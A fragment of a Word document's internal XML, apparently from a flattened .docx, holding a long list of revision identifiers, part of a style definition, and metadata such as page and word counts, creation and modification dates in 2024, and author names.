    <w:rsid w:val="6D4B1553"/>
    <w:rsid w:val="6D5118E8"/>
    <w:rsid w:val="6D711AC2"/>
    <w:rsid w:val="6D85303B"/>
    <w:rsid w:val="6DBF653C"/>
    <w:rsid w:val="6DE6435A"/>
    <w:rsid w:val="6DE7565E"/>
    <w:rsid w:val="6E653BA9"/>
    <w:rsid w:val="6EA0700B"/>
    <w:rsid w:val="6EBE6636"/>
    <w:rsid w:val="6F410D93"/>
    <w:rsid w:val="6F6944D6"/>
    <w:rsid w:val="6F794770"/>
    <w:rsid w:val="6F997223"/>
    <w:rsid w:val="6FAA0FFB"/>
    <w:rsid w:val="6FC925E9"/>
    <w:rsid w:val="700851FC"/>
    <w:rsid w:val="70105F68"/>
    <w:rsid w:val="702F4DE7"/>
    <w:rsid w:val="704E12D0"/>
    <w:rsid w:val="70666977"/>
    <w:rsid w:val="70E1083F"/>
    <w:rsid w:val="70FE236E"/>
    <w:rsid w:val="71671D9D"/>
    <w:rsid w:val="71F95A89"/>
    <w:rsid w:val="72417502"/>
    <w:rsid w:val="72DA05FA"/>
    <w:rsid w:val="72E4478C"/>
    <w:rsid w:val="731352DC"/>
    <w:rsid w:val="731A162D"/>
    <w:rsid w:val="735F14A2"/>
    <w:rsid w:val="736672E4"/>
    <w:rsid w:val="739D767B"/>
    <w:rsid w:val="73CF7C0D"/>
    <w:rsid w:val="73D05436"/>
    <w:rsid w:val="73E67832"/>
    <w:rsid w:val="73FC5259"/>
    <w:rsid w:val="74015E5E"/>
    <w:rsid w:val="741373FD"/>
    <w:rsid w:val="74B54A08"/>
    <w:rsid w:val="74C958A7"/>
    <w:rsid w:val="75003802"/>
    <w:rsid w:val="750A4112"/>
    <w:rsid w:val="753A74C2"/>
    <w:rsid w:val="753E061F"/>
    <w:rsid w:val="755D4028"/>
    <w:rsid w:val="75C857C9"/>
    <w:rsid w:val="75F52E16"/>
    <w:rsid w:val="761323C6"/>
    <w:rsid w:val="76427692"/>
    <w:rsid w:val="764B5DA3"/>
    <w:rsid w:val="766530C9"/>
    <w:rsid w:val="76943C19"/>
    <w:rsid w:val="76F374B5"/>
    <w:rsid w:val="7732281D"/>
    <w:rsid w:val="777F7099"/>
    <w:rsid w:val="7782001E"/>
    <w:rsid w:val="77D44597"/>
    <w:rsid w:val="77D558AA"/>
    <w:rsid w:val="77D571B8"/>
    <w:rsid w:val="781C021C"/>
    <w:rsid w:val="783C6553"/>
    <w:rsid w:val="78674E18"/>
    <w:rsid w:val="786C12A0"/>
    <w:rsid w:val="78A12847"/>
    <w:rsid w:val="78C86E1F"/>
    <w:rsid w:val="79A279F4"/>
    <w:rsid w:val="79EA1711"/>
    <w:rsid w:val="79FD2986"/>
    <w:rsid w:val="7A00250C"/>
    <w:rsid w:val="7A423425"/>
    <w:rsid w:val="7A4A0831"/>
    <w:rsid w:val="7A83793A"/>
    <w:rsid w:val="7A926A27"/>
    <w:rsid w:val="7AD91F55"/>
    <w:rsid w:val="7B0F1874"/>
    <w:rsid w:val="7B242713"/>
    <w:rsid w:val="7B3F62EE"/>
    <w:rsid w:val="7B652283"/>
    <w:rsid w:val="7B8008AE"/>
    <w:rsid w:val="7B8C0E3D"/>
    <w:rsid w:val="7B8C46C1"/>
    <w:rsid w:val="7BC17119"/>
    <w:rsid w:val="7C01687E"/>
    <w:rsid w:val="7C245B39"/>
    <w:rsid w:val="7CB1305E"/>
    <w:rsid w:val="7CCD2ACE"/>
    <w:rsid w:val="7D0F483D"/>
    <w:rsid w:val="7D357BE1"/>
    <w:rsid w:val="7D764D9D"/>
    <w:rsid w:val="7D933791"/>
    <w:rsid w:val="7DE30098"/>
    <w:rsid w:val="7DEE6429"/>
    <w:rsid w:val="7DF266D9"/>
    <w:rsid w:val="7E7A66D9"/>
    <w:rsid w:val="7E9D74C6"/>
    <w:rsid w:val="7EF511DA"/>
    <w:rsid w:val="7EFD07E5"/>
    <w:rsid w:val="7F2C38B2"/>
    <w:rsid w:val="7F410EA6"/>
    <w:rsid w:val="7FBE66A4"/>
    <w:rsid w:val="7FE12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2"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="11">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webp"/><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79</Pages>
  <Words>12665</Words>
  <Characters>82223</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>1</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>94812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2024-02-28T17:22:00Z</dcterms:created>
  <dc:creator>Abdul</dc:creator>
  <cp:lastModifiedBy>MOHAMMED ABDUL RAQEEB</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-04T15:10:31Z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3EEEB96943C34ABE964146C792D854E8_13</vt:lpwstr>
  </property>
</Properties>
</file>